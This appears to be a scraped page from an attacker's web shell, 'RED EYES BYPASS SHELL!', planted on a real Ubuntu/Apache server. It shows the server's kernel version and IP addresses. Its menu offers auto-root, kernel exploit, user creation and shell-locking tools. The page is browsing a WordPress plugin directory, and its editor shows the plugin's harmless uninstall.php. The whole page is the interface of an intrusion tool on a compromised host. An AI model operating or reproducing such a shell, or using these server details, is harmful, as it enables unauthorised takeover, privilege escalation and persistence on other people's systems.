Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
plugins /
pdpa-thailand /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
template
[ DIR ]
drwxr-xr-x
index.php
26
B
-rwxr-xr-x
license.txt
14.77
KB
-rwxr-xr-x
pdpa-thailand.php
2.15
KB
-rwxr-xr-x
readme.txt
20.66
KB
-rwxr-xr-x
uninstall.php
1.06
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uninstall.php
<?php /** * Fired when the plugin is uninstalled. * * Everything in uninstall.php will be executed when user decides to delete the plugin. * @since 1.0 */ // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) exit; // If uninstall not called from WordPress, then die. if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) die; /** * Delete database settings * * @since 1.0 */ // Delete temp file // $files = glob(WP_CONTENT_URL . '/pdpa-thailand'); // get all file names // if ( isset($files) ) { // foreach ( $files as $file ) { // iterate files // if ( is_file($file) ) { // unlink($file); // delete file // } // } // } delete_option('pdpa_thailand_settings'); delete_option('pdpa_thailand_msg'); delete_option('pdpa_thailand_cookies'); delete_option('pdpa_thailand_appearance'); delete_option('pdpa_thailand_js_version'); delete_option('pdpa_thailand_css_version'); delete_option('pdpa_thailand_license_key'); delete_option('pdpa_thailand_license_status'); delete_option('pdpa_thailand_settings'); delete_option('pdpa_thailand_installed');
Close